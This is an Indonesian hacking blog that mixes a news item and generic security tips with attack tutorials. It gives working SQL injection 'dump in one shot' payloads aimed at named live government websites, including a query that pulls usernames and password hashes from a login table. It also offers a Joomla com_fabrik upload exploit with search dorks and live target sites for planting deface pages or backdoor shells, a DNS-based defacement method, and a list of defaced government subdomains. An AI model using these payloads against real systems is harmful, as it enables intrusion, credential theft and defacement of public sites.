SukabumiBlackHat

Tutorial Deface,Hacking,and All about IT

Showing posts with label news. Show all posts

Jika Tak Respons, Rabu WhatsApp Akan Diblokir

No comments



Pemerintah mengancam akan memblokir WhatsApp jika sampai Rabu (8/10) tidak merespons permintaan menghapus konten GIF porno. (dok. antonbe/Pixabay)



Jakarta, CNN Indonesia -- Kementerian Komununikasi dan Informatika (Kemkominfo) mengancam akan memblokir layanan pesan instan Whatsapp pada Rabu (8/11). Ancaman tersebut akan dilakukan jika WhatsApp tak merespons permintaan Kemkominfo untuk memblokir konten pornografi dalam bentuk format gambar GIF yang ada di layanan perpesanannya. 

"Pemblokiran dilakukan kalau tidak ada tanggapan serius dari WhatsApp. Rabu harusnya respon. Kalau ngga direspon bakal diblokir WhatsApp," tegas Dirjen Aptika Kemkominfo, Semuel Abrijani Pangerapan dalam konferensi pers di Gedung Kominfo, Jakarta, Senin (6/11). 


Sebelumnya, Semuel menyebutkan pihaknya sudah melayangkan peringatan kepada WhatsApp sebanyak tiga kali. Peringatan dilayangkan pada Minggu (5/11) malam, Senin (6/11) dini hari, dan Senin (6/11) pagi. 


Kominfo tak cuma melayangkan peringatan kepada WhatsApp. Semuel menyatakan bahwa pihaknya juga sudah mengontak Tenor dan Giphy sebagai penyedia konten GIF di WhatsApp. Sebab, konten pornografi dalam bentuk gambar bergerak dengan format GIF itu memang disediakan oleh pihak ketiga itu. 

Semuel menyebutkan bahwa Giphy sudah memberi respon dan akan melakukan pembersihan konten miliknya untuk Indonesia. 

"Giphy sudah koordinasi," jelas Semuel. "Mereka akan membantu pemerintah Indonesia untuk memfilter konten mereka di Indonesia," tambahnya lagi. 

Sebelumnya pemerintah sudah sempat memblokir Giphy di Indonesia. Untuk kasus kali ini, Semuel menuturkan bahwa Giphy akan mengikuti aturan perundangan Indonesia.

Sementara untuk Tenor, Semuel menyebutkan bahwa pihaknya sudah memblokir enam DNS milik tenor. Keenam DNS tersebut diantaranya adalah tenor.com, blog.tenor.com, ip.com, qr.tenor.com, media1.tenor.com. (eks)


Cara menghindari serangan Hacker jahat

3 comments
thehacker

Yo gais kali ini gua mau bahas cara menghindari  serangan hackerr jahat

wkwkwk lagi-lagi hacker emang kalo bahas tentang hacker tidak akan ada habis nya
wkwk apalagi di indonesia dunia internasional bahkan menggap bahwa indonesia lah dewa nya hacker

Para hacker tidak memandang siapapun korbannya, dan tentunya termasuk Anda pun, bisa menjadi sasaran mereka. Untuk itu, guna menghindari segala kerugian yang di sebabkan oleh para hacker, kita harus berhati-hati saat terhubung dengan jaringan internet.



1.jangan download file sembarangan sekira nya itu tidak penting 

yaps jangan download file sembarangan dari internet karena sebagian file yang tersebar virus yang berbahaya bagi komputer anda  karena  jika virus tersebut telah menginfeksi jangan harap komputer atau laptop anda aman dari serangan para attacker jahat


2.Selalu update anti virus  dan pilihlah antivirus terpercaya

kalian juga harus sering-sering update anti virus yang ada di komputer  anda  dengan cara ini mungkin dapat meminimalisir virus virus yang masuk ke dalam komputer anda etss tapi tidak semua anti virus aman jadi anda harus pintar pintar pilih mana antivirus yang layak di gunakan

3.Gunakan password yang susah di tebak

 beberapa hacker biasa menggunakan cara menebak password atau sering di sebut brute force password cara menghindari serangan ini adalah jangan pernah menggunakan password seperti: tanggal lahir, nama panjang ,angka berurutan 1234 gunakan password yang benar-benar sulit di tebak seperti 4kUc1ntaDia < itu adalah salah satu password yang lumayan susah di tebak .


4.Hindari situs-situs yang meminta data atau informasi anda

yap teknik ini di sebut phising dimana si attacker meminta  data korban seperti username dan password data kartu kredit sebaiknya anda cermat lah memilih situs situs yang berbau phising sangat gampang cara membedakan mana situs phising dan bukan cukup liat domain nya saja apakah itu domain resmi  atau bukan

5.Selalu backup data anda 

 cara ini sangat penting karena bila suatu saat kita kecolongan  atau file file kita di curri kita masih ada file backup an backup file sangat berguna terutama bagi para webmaster yang situs nya sering kecolongan hacker hacker jahil sebaiknya anda memakai cara yang satu ini

Sqli DIOS (DUMP IN ONE SHOT)

No comments

Hallo whats up gais dah lama gx bikin tutor gue wkwokowk males anjir :v  karena ada mood gtau apa hari ini gua mau bikin tutorial lumyan menarik makanya gua bikin yooo simak gais 

tutor nya yaitu dios (DUMP IN ONE SHOT) tutor ini mungkin berguna bagi  para injektor :v
soalnya ni tutor kalo yang suka maenan sqli gak perlu muter muter manual jadi tinggal shoot aee

bahan :
-koneksi internet
-dork vuln sqli
 kalo  target sqli udah pada tau kan ciri ciri web yang vuln terhadap injeksi ? 
kalo gx tau simak dulu di sini 

kalian harus cari web vuln dan cari angka ajaib nya :v 
gua kasih live target ae dah :v http://jdih.bengkaliskab.go.id/baca-berita.html?id-berita=18
nah itu live target nya :'v
yang harus di lakukan ialan mencari jumlah kolom di web tersebut 
cara nya yaitu dengan order+by+  setelah di ketahui ternyata web tersebut error di number 9 
 nah sekarang yang kalian perlukan ialah mencari angka ajaib untuk melakukan DIOS tadi kita gunakan perintah union+select+ 

Nah bisa kalian lihat kan ternyata angka ajaib nya adalah 2 sekarang adalah langkah untuk melakukan DIOS nya caranya ? simak gan
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

nah itu adalah query untuk melakukan dios caranya gampang sangat kalian hanya perlu menambahkan query tersebut ke angka ajaib yang muncul jadi kek gini

http://jdih.bengkaliskab.go.id/baca-berita.html?id-berita=-18%27+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7,8,9+--+

Nah kek di atas kalian ngerti kan nanti akan muncul kaya gambar di bawah

kayak gitu sekarang kita tinggal melakukan perintah  group_concat

yang di kiri adalah column di kanan table
#CMIIW

jadi gini :

http://jdih.bengkaliskab.go.id/baca-berita.html?id-berita=-18%27+union+select+1,group_concat(user,0x3a,pas_enc),3,4,5,6,7,8,9+from+tbl_login+--+



Nah muncul user sama pass nya wkwkw tinggal cari admin login nya beibeh :v





cara jitu nge chat cewe :v

6 comments

okeh gais karna tadi ada req tutor dari salah satu member xaisyndicate dia pen tau cara jitu nge chat ceue :V

nah ituu dia tercyduk SS done wkowkowk langsung aja :v ke tutor ea gan 


pertama tama lu harus yakin bahwa lu bisa chat tuhh cewe walaupun hanya satu huruf :V
 kek gini gue bakal chat ceue secara randomm dengan satu huruf yaitu huruf y 



Masalah di bales ato gx ntuhh mah belakangan :v

eh ajig chatt tadi bales 

heheh kalo masalh cewe maah easyy kita masuk ke langkah berikut nya :v


langkah berikutnya ialah pakai 1000 akal akal an wkowkwokwok mungkin agak aneh sihh  kek gini nihh liat w :V


nah macem gituu :V setelah itu kalian bisa kalian variasikan jenis jenis modus nya :v kalo gue sihh gitu modus nya 

setelah kalian melewati beberapa sesi nanti kalian akan kebawa suasana dan chat an kalian akan terus berlanjut :v
kalo dah lama lebih baik gombalin sihyang belum tau cara gombal di sini cara gombal ala hacker

okey sekian dan terima gaji :v






tutorial sql challange print name,version,user,db dengan tables and coloumns dump in one shot (dios)

1 comment

Malemm gan lagi gx ada kerjaan nih yaudah bikin tutor aja :v lagian jenuh ajigg 10 hari libur sekolah mana sekarang males bikin tutor karna mood w lagi zeeb sangad w mau bikin tutor sql challange  mungkin udah gx asing lagi di telinga para injektor okay langsung aja ke tutorial 


Live  target nya kota gue sendiri :v yaitu   : http://sukabumikab.go.id/ :v

Nah yang kita perlukan ada lah mencari angka ajaib di sebuah web yang vuln sql injection :v 

dah taukan cara nya kalo gx tau baca di  sini nah di situ tutor nya :v

kebetulan gue dah dape angka ajaib nya yaitu di angka 3 liat gambar 


Keliatan kan :V setelah itu kita tambah kan perintah :v 

concat('<font color=red size=4>Di sini nama Lu<br> ',version(),'<br>',user(),'<br>',database(),(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,'<br>','<font color=green size=3>',table_name,'</font> ','  ::  ','<font color=blue size=3>',column_name))),@))))

perintah di simpen di angka tiga tadi :V jadi kek gini

sukabumikab.go.id/ok/page.php?id=-5'+union+select+1,2,concat('<font color=red size=4>Di sini nama Lu<br> ',version(),'<br>',user(),'<br>',database(),(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,'<br>','<font color=green size=3>',table_name,'</font> ','  ::  ','<font color=blue size=3>',column_name))),@)))),4,5,6,7+--+

nahh seperti ituu :v  nanti hasil nya kek di bawah :


Semoga harii kelen menyenangkan :v  











Deface Teknik com_fabrik

No comments

wkwkw malam semua gue mau post nih tentang tutorial deface com_fabrik mungkin udah gx asing buat para master master jadi buat para master  menjauh ae yaa soalnya ni tutor khusus nubi kek gue hehehe langsung aja 

kalian dorking di gugel dork nya 

option=com_fabrik site:.com
view=table&tableid site:.org

*site bisa kalian sesuiakan heheh

.jika kalian mendapatkan target nya kalian tambahkan exploit ini 

index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

kalau vuln akan muncul seperti gambar di bawah 


yapp vuln nya adalah ada tempat upload :v

skrang lu upload script deface lu atau shell backdoor kesayangan lu 



Klik imvort CSV tunggu sebentar kalo muncul gambar kek di bawah ini berarti berhasil gan :v



sekarang kita liat akses nya di  www.site.com/media/namafile.html


ada beberapa live target gan nih :

http://www.wpnery.com/
https://www.unali.net
http://www.ghostshockey.it/
http://www.talani.co.za/

sekian dan terimakasih :v w mau tidur :v bsok di skolah masii ulangan :v bye bye






Deface teknik DNS Afraid

No comments

Haloo temen temen ^_^ dah lama nih gx post soalnya w males anjir :v males bikin tutorial :v
kali ini gue mau bagi tutorial deface dns afraid atau bisa di sebut dns avoid heheheh langsung aja cekidott 

1.lu harus daftar akun dulu di  http://freedns.afraid.org/ sama di https://www.000webhost.com

2.Kalo udah otw cpanel gan 


3.lu masuk directori /public_html dan upload index.php atau script deface lu :v


4.masuk Ke menu parked domain 


Setelah melakukan step step di atas sekarang kalian tinggal otw ke situs  http://freedns.afraid.org/

dan login 


Nah kalian ikutin kaya di gambar 


domain harusa "many many more available"

Klik "shared domain registed"


pilih domain apa aja

jan lupa juga buat type  isi NS 
dan destination isi dengan  ns01.000webhost.com or ns02.000webhost.com biasanya 
TTL : kosongin
wildcard centang 

Lalu klik save 

langsung Otw Ke 000webhost yang di menu parked domain 


Tinggal parked aja say good by :vwkowkow



Kenak kan wkowkokw

Thanks gan telah baca tutor nya :V













hacker retas lebih dari 20 subdomain tegalKota

No comments


haloo gais kembali sama gue kali ini saya akan bahas  peretasan situs pemerintah dalam negeri kali ini situs http://www.tegalkota.go.id/ menjadi sasaran  utama Hacker galau
hacker dengan kode nama Jingklong Meretas domain utama dan subdomain tegalkota.go.id
pesan yang di sampai kan hacker tersebut hanyalah kata-kata galau saja

Disini aku sendiri tanpamu 
Selalu berharap kau berdiri disampingku walau hanya sebentar
Seharusnya perasaanku yang sepihak ini tak berlabuh
Hatiku begitu sedih tak dapat ku kendalikan
Mataku selalu meneteskan airmata tanpa ku perintah

I miss you
I miss you always
Aku masih tak bisa jujur pada diriku sendiri..
Aku tidak pernah berfikir bahwa kau akan meninggalkanku
Dan aku tidak pernah berfikir kepergianmu begitu menyakitiku

My heart is aching uncontrollable.
I need you here right next to me,
Why did you leave me? 
I always thought of us forever,although forever is a really long time. 

Hacker Ini tidak menebas halaman utama website hanya menitip file di directory public_html  dengan nama aye.htm
adapun web web yang berhasil di retas adalah :

http://bappeda.tegalkota.go.id/aye.htm
http://dinkes.tegalkota.go.id/aye.htm
http://disdik.tegalkota.go.id/aye.htm
http://dishubkominfo.tegalkota.go.id/aye.htm
http://dppkad.tegalkota.go.id/aye.htm
http://dpu.tegalkota.go.id/aye.htm
http://jdih.tegalkota.go.id/aye.htm
http://klh.tegalkota.go.id/aye.htm
http://pariwisata.tegalkota.go.id/aye.htm
http://ppid.tegalkota.go.id/aye.htm
http://sanitasi.tegalkota.go.id/aye.htm
http://setda.tegalkota.go.id/aye.htm
http://tegalkota.go.id/aye.htm
http://tpid.tegalkota.go.id/aye.htm
http://www.bkd.tegalkota.go.id/aye.htm
http://www.dinkes.tegalkota.go.id/aye.htm
http://www.disdik.tegalkota.go.id/aye.htm
http://www.disdukcapil.tegalkota.go.id/aye.htm
http://www.dishubkominfo.tegalkota.go.id/aye.htm
http://www.dpu.tegalkota.go.id/aye.htm
http://www.jdih.tegalkota.go.id/aye.htm
http://www.pariwisata.tegalkota.go.id/aye.htm
http://www.sanitasi.tegalkota.go.id/aye.htm
http://www.setda.tegalkota.go.id/aye.htm
http://www.tegalkota.go.id/aye.htm

sampai berita ini di terbitkan belum ada  perbaikan dari pihak admin web tegal kota
semoga kasus peretasan ini menjadi pelajaran bagi para web master

salam reporter 29 :v